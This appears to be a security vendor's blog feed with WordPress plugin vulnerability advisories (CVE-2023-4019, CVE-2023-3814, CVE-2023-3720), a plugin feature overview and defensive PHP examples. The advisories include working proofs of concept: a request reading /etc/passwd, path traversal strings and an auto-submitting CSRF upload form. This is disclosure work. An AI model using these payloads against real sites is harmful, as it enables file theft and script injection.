Category: Security

  • CVE-2023-4019 – Media from FTP < 11.17 - Author + Arbitrary File Access via Path Traversal


    During testing of WordPress plugins, a high-impact vulnerability was found in the Media from FTP plugin in versions before 11.17. The flaw allows Path Traversal, giving an attacker unauthorized access to sensitive files and documents. The plugin does not properly limit who can use it, so users with Author+ privileges may move files around, including wp-config.php, which may lead to RCE in some cases.

    Main info:

    CVE: CVE-2023-4019
    Plugin: Media from FTP
    Severity: High
    Publicly Published: August 14, 2023
    Last Updated: August 14, 2023
    Researcher: Dmitrii Ignatyev
    OWASP TOP-10: A5: Broken Access Control
    PoC: Yes
    Exploit: Will be later
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4019
    https://wpscan.com/vulnerability/0d323b07-c6e7-4aba-85bc-64659ad0c85d
    Plugin Security Certification by CleanTalk

    Timeline

    July 26, 2023: Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
    July 26, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    July 31, 2023: The author has released a fix update
    August 14, 2023: Registered CVE-2023-4019

    Discovery of the Vulnerability

    During testing of the plugin, a vulnerability was discovered in the mediafromftp-update-ajax-action handler, which allows downloading local files from outside /var/www/html into the media library, which gives attackers huge potential: they can pull any local file into the media and then view it, for example /etc/passwd, /etc/hosts and other local files and documents. This is possible on behalf of a user with Author rights. By default, an Author is not authorized to view local files and cannot interact with them directly, so exposure of local files is very critical for the application owner. To eliminate this vulnerability, I ask you to validate the path that the user enters and, if it does not contain the root directory, to return Forbidden.

    Understanding Path Traversal attacks

    Path Traversal, a well-known attack technique, is at the core of this vulnerability. It involves manipulating file paths to cross directory boundaries and access files beyond the intended scope; attackers use it to reach files and directories that are otherwise restricted. See: Path Traversal (OWASP TOP-10).

    Exploiting the Path Traversal vulnerability

    Exploiting the CVE-2023-4019 vulnerability empowers attackers to venture outside the restricted directory of /var/www/html. This enables them to download local files, even those residing in sensitive system directories.

    POC:

    1) Go to /wordpress/wp-admin/admin.php?page=mediafromftp-search-register

    2) Select any file from the media text list below

    3) Click “Update Media”

    4) Intercept request with action=mediafromftp-update-ajax-action

    5) Change new_url to a local path like /etc/passwd or /etc/hosts

    POC request:

    POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
    Host: your_host
    User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=mediafromftp-search-register
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 123
    Origin: http://your_host
    DNT: 1
    Connection: close
    Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1690606171%7CfCvhmGhE1pXZ9e5sGp38GZd5KqlrcKsCvkhWuFVd7g9%7Cb8692eb78cc5aa5fb9911291a78d34a0e04461ed834d1ca96b121cf1ef714aff; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1690606171%7CfCvhmGhE1pXZ9e5sGp38GZd5KqlrcKsCvkhWuFVd7g9%7C1fe25db056c3038ca9accd05f2608008d9db007ec3d7b37572208454e3f62357; wp-settings-time-2=1690433465
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin

    action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36

    Potential Risks and Real-World Impact

    The Path Traversal vulnerability within the Media from FTP plugin introduces grave risks and potential scenarios:

    1. Data Exposure:
      Attackers can access and potentially download sensitive files containing confidential information, jeopardizing data privacy and integrity.
    2. Malicious Use of Stolen Data:
      Extracted data from unauthorized file access could be used maliciously, undermining the integrity of the entire system.
    3. System Disruption:
      Access to sensitive files could lead to unintended modifications, potentially disrupting the functioning of the WordPress installation.

    Recommendations for Improved Security

    Safeguard your WordPress environment against CVE-2023-4019 and fortify your digital stronghold:

    • Immediate Plugin Update:
      Upgrade the Media from FTP plugin to version 11.17 or above. This update addresses the Path Traversal vulnerability and enhances security.
    • Input Validation:
      Developers should incorporate robust input validation mechanisms to ensure that user-provided data is sanitized and restricted to authorized directories.
    • Regular Security Audits:
      Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
    • Path Validation:
      Implement robust path validation mechanisms to ensure that user-entered paths remain within the authorized directory scope.

    Empower the WordPress community with the knowledge of CVE-2023-4019. Share this article far and wide to ensure website owners take proactive measures against this critical vulnerability.

    #WordPressSecurity #PathTraversalVulnerability #WebsiteSafety #StayProtected

    Use CleanTalk solutions to improve the security of your website

    Dmitrii i.

    If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


    Check my website

  • CVE-2023-3814 – Advanced File Manager < 5.1.1 - Admin+ Arbitrary File/Folder Access via Path Traversal


    In the realm of WordPress plugins, a severe security vulnerability has been unveiled. A comprehensive testing process revealed a critical flaw within the Advanced File Manager plugin, specifically versions up to 5.1.1. This vulnerability exposes a significant security lapse that can potentially allow unauthorized access to files and folders through Path Traversal techniques.

    Main info:

    CVE: CVE-2023-3814
    Plugin: Advanced File Manager
    Severity: High
    Publicly Published: August 14, 2023
    Last Updated: August 14, 2023
    Researcher: Dmitrii Ignatyev
    OWASP TOP-10: A5: Broken Access Control
    PoC: Yes
    Exploit: Will be later
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3814
    https://wpscan.com/vulnerability/ca954ec6-6ebd-4d72-a323-570474e2e339
    Plugin Security Certification by CleanTalk

    Timeline

    July 13, 2023: Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
    July 13, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    August 9, 2023: The author has released a fix update
    August 14, 2023: Registered CVE-2023-3814

    Discovery of the Vulnerability

    During testing, it was discovered that it is possible to change the root folder from which the plugin reads and shows information to the user. Usually such plugins restrict leaving the /var/www/html directory, but in this plugin the root folder can be changed to any operating system directory, such as /home. The same can also be achieved with Path Traversal, e.g. /var/www/html/../../../etc, /home and so on.

    Understanding Path Traversal attacks

    Path Traversal is an attack technique that involves manipulating file paths to access files and directories beyond the intended scope. Attackers can exploit this vulnerability to break out of the restricted directory and gain access to sensitive files and directories in other parts of the system. See: Path Traversal (OWASP TOP-10).

    Exploiting the Path Traversal vulnerability

    Exploiting this Path Traversal vulnerability within the Advanced File Manager plugin could empower attackers to change the root folder, allowing them to view, access, and potentially download files from locations that are off-limits under normal circumstances.

    POC:

    1. Go to settings page (/wordpress/wp-admin/admin.php?page=file_manager_advanced_controls)

    2. In the “Public Root Path” setting, change directory to /home or you can use Path Traversal /var/www/html/../../../home or /var/www/html/wordpress/../../../../etc

    3. Then navigate to the page of plugin (/wordpress/wp-admin/admin.php?page=file_manager_advanced_ui#elf_l1_Lw)

    4. You will be able to list the files/folders outside of WordPress root directory
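    Both advisories ask the same thing of the developer: resolve the user-supplied path (new_url in Media from FTP, the "Public Root Path" setting here) and refuse anything that lands outside the permitted base directory. The following is an added example and not code from either plugin; the ct_ function and hook names are hypothetical and a POSIX filesystem is assumed.

```php
<?php
// Added example (not from either plugin): reject any user-supplied path that
// resolves outside an allowed base directory. Function and hook names are
// hypothetical; POSIX "/" separators are assumed.

/** Lexically resolve "." and ".." so "/var/www/html/../../../etc" becomes "/etc". */
function ct_normalize_path(string $path): string
{
    $parts = [];
    foreach (explode('/', $path) as $seg) {
        if ($seg === '' || $seg === '.') {
            continue;
        }
        if ($seg === '..') {
            array_pop($parts);            // ".." at the root stays at the root
            continue;
        }
        $parts[] = $seg;
    }
    return '/' . implode('/', $parts);
}

/**
 * True only if $candidate lies inside $base (or is $base itself).
 * Symlinks are followed with realpath() when the path exists, so a link
 * planted inside the base cannot point back out. The trailing "/" on the
 * base stops "/var/www/html-old" from matching base "/var/www/html".
 */
function ct_path_within_base(string $candidate, string $base): bool
{
    $realBase = realpath($base);
    $base = rtrim($realBase !== false ? $realBase : ct_normalize_path($base), '/') . '/';

    $norm = ct_normalize_path($candidate);
    $real = realpath($norm);              // false when the target does not exist yet
    if ($real !== false) {
        $norm = $real;
    }
    return strncmp($norm . '/', $base, strlen($base)) === 0;
}

// How the check sits in an admin-ajax handler (only registered inside WordPress):
// nonce, capability and path containment are all verified before any file move.
if (function_exists('add_action')) {
    add_action('wp_ajax_ct_example_update', function () {
        check_ajax_referer('ct_example_update', 'nonce');      // CSRF protection
        if (!current_user_can('manage_options')) {             // Author+ is not enough
            wp_send_json_error('forbidden', 403);
        }
        $newUrl = isset($_POST['new_url']) && is_string($_POST['new_url'])
            ? wp_unslash($_POST['new_url']) : '';
        $allowed = wp_upload_dir()['basedir'];
        if (!ct_path_within_base($newUrl, $allowed)) {
            wp_send_json_error('path outside the upload directory', 400);
        }
        // ...continue with the validated path only...
        wp_send_json_success();
    });
}

// Stand-alone demonstration (php thisfile.php) with the paths quoted in both advisories.
if (PHP_SAPI === 'cli' && !function_exists('add_action')) {
    $base = '/var/www/html';
    foreach ([
        '/var/www/html/wp-content/uploads/photo.jpg',
        '/etc/passwd',
        '/var/www/html/../../../home',
        '/var/www/html/wordpress/../../../../etc',
        '/var/www/html-old/secret',
    ] as $p) {
        printf("%-45s %s\n", $p, ct_path_within_base($p, $base) ? 'allowed' : 'rejected');
    }
}
```

    Only the first path in the demonstration list is accepted; the traversal forms from both PoCs and the look-alike prefix are rejected.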

    Potential Risks and Real-World Impact

    The Path Traversal vulnerability within the Advanced File Manager plugin introduces grave risks and potential scenarios:

    1. Data Exposure:
      Attackers can access and potentially download sensitive files containing confidential information, jeopardizing data privacy and integrity.
    2. Malicious Code Injection into OS folders:
      By manipulating file paths, hackers may insert malicious code into system files, leading to the compromise of the entire website.
    3. Escalation of Privileges:
      Exploiting this vulnerability could provide attackers with unauthorized administrative access, leading to unauthorized control and manipulation of the WordPress environment.

    Recommendations for Improved Security

    To fortify your WordPress website against the CVE-2023-3814 vulnerability and enhance overall security, consider implementing the following preventive measures:

    • Immediate Plugin Update:
      Upgrade to Advanced File Manager plugin version 5.1.2 or higher. This update addresses the Path Traversal vulnerability and strengthens security.
    • Input Validation:
      Developers should incorporate robust input validation mechanisms to ensure that user-provided data is sanitized and restricted to authorized directories.
    • Regular Security Audits:
      Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
    • User Awareness:
      Educate administrators about the risks of clicking on unknown links or visiting suspicious websites, emphasizing the importance of vigilance.

    By addressing the Path Traversal vulnerability within the Advanced File Manager plugin and adhering to these security recommendations, you can safeguard your WordPress website from unauthorized file and folder access, mitigating potential breaches and preserving the confidentiality of your data.

    Dmitrii i.

  • We Have Reduced the Malware Code Analysis Time from 36 Hours to 10 Minutes


    When the Security Malware Scanner detects a suspicious file, the file is sent for analysis; earlier, this analysis was done manually by our team.

    For 3 months now the files have been processed by our AI and the average analysis time has decreased from 36 hours to 10 minutes. However, we continue to double-check the results manually in order to guarantee perfect quality. This allowed us to raise the accuracy of the analysis and increase its speed tremendously.

    And this is just the beginning. The AI-driven machine analysis data will be used to train the algorithm further and improve the scanner’s performance.

  • CVE-2023-3720 – Upload Media By URL < 1.0.8 - Stored XSS via CSRF


    During a thorough security assessment of the Upload Media By URL plugin for WordPress, a concerning medium-level vulnerability has been uncovered in versions prior to 1.0.8. This vulnerability poses a significant risk to your website’s security and calls for immediate action! If exploited, this vulnerability allows attackers to potentially upload files containing malicious code directly to your WordPress site, exposing your users to harmful scripts and attacks.

    Main info:

    CVE: CVE-2023-3720
    Plugin: Upload Media By URL
    Severity: Medium
    Publicly Published: August 2, 2023
    Last Updated: August 2, 2023
    Researcher: Dmitrii Ignatyev
    OWASP TOP-10: A2: Broken Authentication and Session Management
    PoC: Yes
    Exploit: Will be later
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3720
    https://wpscan.com/vulnerability/16375a7f-0a9f-4961-8510-d047ffbf3954
    Plugin Security Certification by CleanTalk

    Timeline

    July 10, 2023: Plugin testing and vulnerability detection in the Upload Media By URL plugin have been completed
    July 10, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    July 17, 2023: The author has eliminated the vulnerability and patched his plugin
    August 2, 2023: Registered CVE-2023-3720

    Discovery of the Vulnerability

    During a security assessment of the Upload Media By URL plugin for WordPress, a medium vulnerability was identified in versions prior to 1.0.8. The plugin lacked Cross-Site Request Forgery (CSRF) protection when handling file uploads, allowing attackers to trick logged-in administrators into uploading files on their behalf, including HTML files containing malicious JavaScript code that could execute when accessed by users with the unfiltered_html capability.

    Understanding Cross-Site Request Forgery (CSRF)

    Cross-Site Request Forgery (CSRF) is an attack that forces an authenticated user to execute unwanted actions on a web application without their knowledge or consent. In this case, attackers can exploit the absence of CSRF protection in the Upload Media By URL plugin to create a crafted HTML file hosted on an external server. If a privileged user, such as an administrator, unknowingly accesses the external link, the malicious HTML file can trigger the upload of harmful files onto the WordPress system.

    Exploiting the Cross-Site Request Forgery (CSRF) vulnerability

    By crafting a malicious HTML file that includes a CSRF payload, attackers can entice administrators with upload privileges to visit the external link. Once the link is accessed, the malicious file exploits the lack of CSRF protection in the plugin to perform unauthorized actions, effectively tricking the administrator into uploading harmful files to the WordPress site.

    POC code:

    <html>
      <body>
        <script>history.pushState('', '', '/')</script>
        <form action="http://your_site/wordpress/wp-admin/upload.php" method="POST" enctype="multipart/form-data">
          <input type="hidden" name="multiurl" value="http://your_external_server/123.html" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          document.forms[0].submit();
        </script>
      </body>
    </html>

    Potential Risks and Real-World Impact

    The CSRF vulnerability in the Upload Media By URL plugin poses severe risks to website administrators and users alike. Beyond the technical implications, it also serves as a potential tool for social engineering attacks. Real-world scenarios include:

    1. Stored Cross-Site Scripting (XSS) Attacks:
      Attackers could upload HTML files containing embedded XSS payloads, compromising the security and privacy of users accessing the affected pages and potentially exposing sensitive data or credentials. In almost all cases, Stored XSS is used to steal cookies and thereby take over accounts.
    2. Malware Distribution:
      Malicious files, such as infected scripts or executables, could be uploaded, leading to the dissemination of malware among website visitors or affecting the overall integrity of the website.
    3. Unauthorized Content Injection:
      Attackers might use this vulnerability to inject unauthorized content into the website, damaging the site’s reputation, or defacing it with inappropriate or harmful materials.
    4. Social Engineering Exploits:
      Since the plugin allows the upload of files, attackers could craft seemingly innocent files (e.g., images, documents) with misleading names or enticing content to lure unsuspecting users into downloading or opening the files, facilitating social engineering attacks.

    Recommendations for Improved Security

    To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

    • Immediate Plugin Update:
      Website administrators should update the Upload Media By URL plugin to the latest version, which includes CSRF protection and patches this vulnerability.
    • Implement CSRF Protection:
      Plugin developers should include robust CSRF protection mechanisms when processing sensitive actions, such as file uploads, to prevent unauthorized access.
    • Regular Security Audits:
      Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
    • User Privilege Restriction:
      Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions.
    • User Awareness:
      Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords.
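    What the CSRF fix looks like in WordPress terms, as an added example that is not the plugin's own code: the form carries a nonce tied to the logged-in user, the handler verifies it with check_admin_referer() before doing anything, and file types outside the site's allowed list (HTML is not allowed by default) are refused, which also closes the stored-XSS route. It assumes it runs inside WordPress; the ct_example_ names and the form field layout are hypothetical.

```php
<?php
// Added example (not the plugin's code): a nonce-protected "upload by URL"
// form and its handler. Runs inside WordPress; ct_example_ names are hypothetical.

/** Render the form with a nonce bound to this action and the current user's session. */
function ct_example_render_form(): void
{
    echo '<form method="post" action="' . esc_url(admin_url('upload.php')) . '">';
    wp_nonce_field('ct_example_upload_by_url', 'ct_example_nonce');
    echo '<input type="url" name="multiurl" required />';
    echo '<button type="submit" name="ct_example_submit">Upload</button>';
    echo '</form>';
}

/**
 * Handle the submission. A cross-site form like the PoC above cannot supply a
 * valid nonce, so check_admin_referer() stops it before anything is fetched.
 */
function ct_example_handle_submission(): void
{
    if (!isset($_POST['ct_example_submit'])) {
        return;
    }
    // Dies with "The link you followed has expired." when the nonce is missing or wrong.
    check_admin_referer('ct_example_upload_by_url', 'ct_example_nonce');

    if (!current_user_can('upload_files')) {
        wp_die('Insufficient permissions', '', ['response' => 403]);
    }

    $url = isset($_POST['multiurl']) && is_string($_POST['multiurl'])
        ? esc_url_raw(wp_unslash($_POST['multiurl'])) : '';
    if ($url === '' || !in_array(wp_parse_url($url, PHP_URL_SCHEME), ['http', 'https'], true)) {
        wp_die('Invalid URL', '', ['response' => 400]);
    }

    // Stored-XSS angle: accept only types in the site's allowed MIME list.
    // "123.html" from the PoC yields ext === false here on a default install.
    $filename = basename(wp_parse_url($url, PHP_URL_PATH) ?? '');
    $type = wp_check_filetype($filename);
    if (empty($type['ext'])) {
        wp_die('File type not permitted', '', ['response' => 400]);
    }

    // Fetch and sideload with core helpers so the usual upload checks apply.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    require_once ABSPATH . 'wp-admin/includes/media.php';
    require_once ABSPATH . 'wp-admin/includes/image.php';
    $tmp = download_url($url);
    if (is_wp_error($tmp)) {
        wp_die(esc_html($tmp->get_error_message()), '', ['response' => 502]);
    }
    $id = media_handle_sideload(['name' => $filename, 'tmp_name' => $tmp], 0);
    if (is_wp_error($id)) {
        @unlink($tmp);
        wp_die(esc_html($id->get_error_message()), '', ['response' => 400]);
    }
}
add_action('admin_init', 'ct_example_handle_submission');
```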

    By addressing the CSRF vulnerability in the Upload Media By URL plugin and implementing these security recommendations, website owners can significantly reduce the likelihood of security breaches, protect their site’s integrity, and safeguard against social engineering exploits.

    Dmitrii i.

  • CleanTalk Security Plugin Tools for WordPress


    1. Protection against brute-force attacks is essential to prevent unauthorized access to systems and accounts. A brute-force attack is a method where attackers sequentially try all possible password combinations for an account and sometimes gain access to the system. The CleanTalk plugin has options such as:
      1.1. Number of unsuccessful authorizations before blocking occurs.
      1.2. Lockout time of the visitor which is the time period between login attempts.
      1.3. Time period the IP will be blocked for when the limit of unsuccessful authorizations is reached.

    2. User Actions Log is designed to track user actions in the WordPress Dashboard and ensure security. It allows you to record and display user actions in real time, to see which pages of the website backend and at what time they were visited. This tool is useful for detecting and preventing hacking attempts, unauthorized access, and other suspicious activities on the website.

    3. Security Firewall is designed to block access to the site under certain conditions:
      3.1. The CleanTalk Database of Dangerous IP Addresses is used to block access to the site for IP addresses that have already participated in hacking attempts on other sites.
      3.2. Your Personal Lists of IP Addresses are used to block access to the site.
      You can add custom IP addresses, networks, and countries on your CleanTalk Dashboard.
      Visitors that were blocked by the Security FireWall will not be able to pass it and get to your site.

    4. Security Report provides a summary of how the plugin works on your websites. The report is being sent once a week to your email address and provides the following statistics:
      4.1. Blocked requests in Security FireWall
      4.2. Number of brute-force attempts
      4.3. Successful admin logins
      4.4. Malware scanner statistics

    5. The option “Notifications of administrator users authorizations” sends you a notification by email every time you successfully log in with an administrator account. This allows you to quickly receive information about unauthorized users.

    6. Real-Time Traffic Monitor feature provides you with real-time traffic information on your website. It helps you in tracking visitors activity and detect potentially malicious traffic — these can be password cracking attempts, SQL injections, DDOS attacks, and other threats.

      The feature also allows you to see bots activity on your site. Bots can have different intentions, but it’s important to be able to distinguish real users from automated bots. You can view the list of bots and take action to block unwanted activity.
      You can see data such as IP address, location, country, and other information that will help determine if a visitor is a suspicious or unwanted bot. It will also help you make the appropriate security settings.

      The feature works in real time, meaning you can see the activity immediately without a delay. You can view the current users on the site, as well as which pages or sections of the site are currently being viewed.

    7. Malware Scanner is one of the features of the CleanTalk Security Plugin for WordPress that is designed to detect and remove malicious code on your website.
      Daily automatic site scanning. The plugin scans your site once a day and you will receive up-to-date information about your site cleanness. You can choose the time period for the automatic site scanning — every 12 hours, 24 hours, 3 days, 7 days, 14 days, or every 30 days.

      The Malware Scanner feature analyzes all files on your site, including the WordPress core files, themes and plugins. It looks for vulnerabilities, malicious scripts, and other suspicious elements that may be related to malicious code.

      When Malware Scanner detects malware or suspicious files, it alerts you instantly via email. You will receive a detailed report of the found threats, including the file names. This will help you quickly respond and take necessary actions to remove malware.

      Automatic Malicious Code Removal: The CleanTalk Security Plugin for WordPress provides this feature to automatically remove malicious code. If there is a known signature for the detected malicious code, the file will be disinfected automatically.

    8. The option “Collect and send PHP log” allows you to automate the process of checking your PHP logs for errors that occur while your site is running. Errors could appear for a short period of time and only when one specific function is running, they can’t be spotted in other circumstances so sometimes it’s hard to catch them. The CleanTalk Scanner will check your website backend once per hour. Statistics of errors are available in your CleanTalk Dashboard.

    9. 2FA: WordPress Two-Factor Authentication is a tool to provide an additional level of security for the website administrator account.
      The main purpose of 2FA is to protect user accounts from unauthorized access, even if an attacker knows the user’s password.
      When a user enters their password to log into their WordPress account, 2FA requires them to provide a second authentication code. The code is being sent to the WordPress account email address.

      The CleanTalk Security plugin allows administrators to set up 2FA for various user roles. So they can grant 2FA to certain groups of users.
      The option “Custom WP-Login URL” in the CleanTalk Security Plugin for WordPress allows you to change the default login URL of your WordPress Dashboard (wp-login.php). This is useful for several reasons:

      • Protection against brute-force attacks: Changing the login URL of the admin panel makes it less predictable and harder for attackers to determine. Most brute-force scripts and bots look for the standard URL, so using a custom URL improves security.
      • Hiding the fact that WordPress is being used: Many hackers and attackers specifically look for sites built on WordPress in order to gain access to them. Changing the login URL makes your site less vulnerable to attacks that work by the principle of a “Default WordPress Login URL Search”.
      • If you use a custom login URL, it may be more memorable and convenient for you. You can choose a URL that is easy to remember or related to your brand.
      • Prevent spam and DDoS attacks: Changing your login URL can help you prevent spam bots and DDoS attacks that often target a standard URL. This can significantly reduce the amount of unwanted activity and improve the performance of your site.

    10. The option “Prevent collecting of authors’ logins” in the CleanTalk Security Plugin for WordPress is an additional tool to protect your site from malicious attacks and unauthorized access.

      One of the most common ways of attacking websites is by attempting to hijack the accounts of the administrator or content authors. A hacker can use various methods to gain access to usernames and passwords and use them for malicious purposes such as injecting malicious code, modifying website content, and even stealing user data.

      The option in the CleanTalk Security Plugin can greatly reduce the risk of such attacks. This feature allows you to hide the names of your authors (logins) from public view on the site, storing them in the database for administrative access only.

      Firstly, it will prevent attackers from accessing authors’ data, which will significantly complicate the hacking process. Secondly, the site will look more secure and inaccessible to hackers. Thirdly, using this option reduces the likelihood of data leakage and privacy violations.

    11. The option “Disable XML-RPC” in the CleanTalk Security Plugin is an important step to increase security and prevent potential attacks on your site.

      XML-RPC is a protocol that allows you to remotely interact with your WordPress site. It was created to facilitate data transfer and information exchange with other platforms. However, due to several vulnerabilities, XML-RPC can become an entry point for hackers.

      One of the main reasons for disabling XML-RPC is the possibility of an attack called brute-force. This attack involves attempts to forcefully input different random passwords for administrative accounts in a rapid succession. XML-RPC, by its very nature, allows attackers to carry out such attacks because it allows iterative validation of multiple passwords without restrictions. Disabling XML-RPC greatly reduces the risk of such attacks and prevents unauthorized access to your site.

      In addition, XML-RPC can also be used to carry out DDoS (Distributed Denial of Service) attacks. Attackers can use XML-RPC to send a large number of requests to your site at the same time, which can lead to server overload and temporary site denial of service. Disabling XML-RPC protects your site from such attacks and helps keep it running for your visitors.

      Disabling XML-RPC in WordPress is quite simple. You can do this with the CleanTalk Security Plugin and enable the option “Disable XML-RPC”. It is recommended to disable XML-RPC unless you are using it to communicate with other platforms or services.

    12. The option “Disable REST API for non-authenticated users”. The REST API is a set of programming interfaces that allow you to interact with your WordPress site and access data and functionality. However, access to the REST API can become a vulnerability for attackers if the option “Disable REST API for non-authenticated users” is not enabled. Examples: getting a list of all posts, creating a new post or updating an existing one, deleting a post, getting/creating users and comments.

      Disabling the REST API for unauthenticated users has several benefits. First, it reduces the risk of an attack on your site. If an attacker gains access to the REST API, they can use this opportunity to obtain sensitive data, change site content, or perform other unwanted actions. Disabling the REST API for unauthenticated users helps in preventing these potential attacks.

      Second, disabling the REST API for unauthenticated users helps improve the performance of your site. The REST API can put a load on the server, especially when trying to process many requests from unauthenticated users. Disabling this feature for these users reduces the server load and speeds up your site response.

      Enabling the option “Disable REST API for non-authenticated users” in the CleanTalk Security Plugin is very simple. Just activate this option in the plugin settings and save the changes. It is important to note that this option will not affect authenticated users, and they will be able to continue using the REST API without any issues. If you only use the WordPress Dashboard to work with the site and want to increase the security level of your resource, then it is recommended to disable the WP REST API.

    13. The option “Forbid to show your website in <iframe> tags on third-party websites” in CleanTalk Security prevents your site from being embedded in an <iframe> on other websites. An <iframe> is an HTML element that allows you to embed one web page inside another. Technically speaking, <iframe> can be used to display your site on other third-party sites while still maintaining visual and functional content. However, this can also lead to security risks and undesirable consequences.

      This has several advantages. First, it protects your site from potential fraudulent activities. Some attackers may create embedded iframe copies of your website to fraudulently collect personal information from your visitors or for other malicious purposes. Forbidding <iframe> embedding prevents this possibility and protects your users.

      Second, opting out of showing your site in an <iframe> on third-party websites helps you control content and prevent copyright loss. If your site is embedded in another website’s <iframe> without your consent, this may result in improper display and control of your content. Disabling <iframe> allows you to retain full control over how and where your site is displayed.

      Enabling the option “Forbid to show your website in <iframe> tags on third-party websites” in the CleanTalk Security Plugin is very simple. It is enough to activate this option in the plugin settings, and your site will be protected from embedding in <iframe> tags on third-party websites.

    14. The option “Add these headers to the HTTP responses on the public pages: X-Content-Type-Options, X-XSS-Protection” in CleanTalk Security allows you to add the X-Content-Type-Options and X-XSS-Protection security headers to the HTTP responses on your site’s public pages. These headers tell browsers how to process the content of the page and prevent possible XSS-based attacks and malware downloads.

      XSS (cross-site scripting) and drive-by download attacks are among the most common and dangerous threats in the online environment. XSS attacks can allow attackers to inject and execute malicious code on your site, while drive-by download attacks attempt to download and install malicious software without the admin’s knowledge.

      The X-Content-Type-Options header tells the browser that page content should only be processed according to the specified MIME type (Multipurpose Internet Mail Extensions). This helps prevent possible attacks based on the content type and provides an additional layer of protection.

      The X-XSS-Protection header is designed to protect against XSS (cross-site scripting) attacks. It enables the browser’s built-in protection mechanisms that detect and block attempts to execute malicious scripts in a timely manner.

      Enabling the option “Add these headers to the HTTP responses on the public pages: X-Content-Type-Options, X-XSS-Protection” in the CleanTalk Security Plugin is very simple. Just enable this option in the plugin settings and the headers will be automatically added to the HTTP responses on the public pages of your site.
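      To show what options 13 and 14 actually do on the wire, here is an added example of a small WordPress snippet that sends the same kind of response headers on public pages. It is an illustration written for this article, not CleanTalk’s plugin code: the hook (`send_headers`) and the WordPress functions are standard APIs, the function name `example_add_public_security_headers` is our own. It also covers the frame-ancestors directive of Content-Security-Policy, which is the modern counterpart of X-Frame-Options and is not mentioned above.

```php
<?php
/**
 * Illustrative example (not CleanTalk's plugin code): add the security
 * headers discussed in options 13 and 14 to the public pages of a site.
 * Hook and API names are standard WordPress; the function name is ours.
 */
add_action( 'send_headers', 'example_add_public_security_headers' );

function example_add_public_security_headers() {
    // Public pages only: skip wp-admin screens and admin-ajax requests,
    // and do nothing if output has already started.
    if ( is_admin() || wp_doing_ajax() || headers_sent() ) {
        return;
    }

    // Option 13: forbid embedding in <iframe> on third-party sites.
    // X-Frame-Options is the legacy header; the CSP frame-ancestors
    // directive is its modern equivalent. Sending both covers old and
    // new browsers; SAMEORIGIN / 'self' still allows your own pages to
    // frame each other.
    header( 'X-Frame-Options: SAMEORIGIN' );
    header( "Content-Security-Policy: frame-ancestors 'self'" );

    // Option 14: forbid MIME sniffing, so the browser never treats a
    // response as a script or stylesheet unless the Content-Type says so.
    header( 'X-Content-Type-Options: nosniff' );

    // Option 14: legacy reflected-XSS filter. "1; mode=block" is the
    // classic value; note that current Chrome, Edge and Firefox no longer
    // implement this filter, so a Content-Security-Policy is what does
    // this job in modern browsers.
    header( 'X-XSS-Protection: 1; mode=block' );
}
```

      After enabling the plugin option (or dropping a snippet like this into a site-specific plugin), you can confirm the headers from the command line with `curl -sI https://your_site_here/ | grep -i -E 'x-frame|frame-ancestors|x-content-type|x-xss'`.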

      In this article we have tried to tell you about the main and most useful options of the CleanTalk Security Plugin for WordPress. You can install the plugin from the official WordPress directory here: https://wordpress.org/plugins/security-malware-firewall

      If you have any questions about the CleanTalk Security Plugin functions, feel free to ask them in the comments and we will be happy to assist you.
  • CVE-2023-3601 – Simple Author Box < 2.52 - Contributor+ Arbitrary User Information Disclosure via IDOR (Thief of Creds)

    CVE-2023-3601 – Simple Author Box < 2.52 - Contributor+ Arbitrary User Information Disclosure via IDOR (Thief of Creds)

    We have discovered a severe security vulnerability in the Simple Author Box plugin (CVE-2023-3601), which puts your WordPress accounts at high risk of being compromised. This vulnerability allows attackers with Contributor-level access or higher to steal sensitive user information, including hashed passwords.

    Main info:

    CVE: CVE-2023-3601
    Plugin: Simple Author Box
    Critical: Very High
    Publicly Published: July 24, 2023
    Last Updated: July 24, 2023
    Researcher: Dmitrii Ignatyev
    OWASP TOP-10: A01:2021-Broken Access Control
    PoC: Yes
    Exploit: Will be later
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3601
    https://wpscan.com/vulnerability/c0cc513e-c306-4920-9afb-e33d95a7292f
    Plugin Security Certification by CleanTalk

    Timeline

    July 5, 2023: Plugin testing and vulnerability detection in the Simple Author Box plugin have been completed
    July 6, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    July 16, 2023: The author has eliminated the vulnerability and patched his plugin
    July 24, 2023: Registered CVE

    Discovery of the Vulnerability

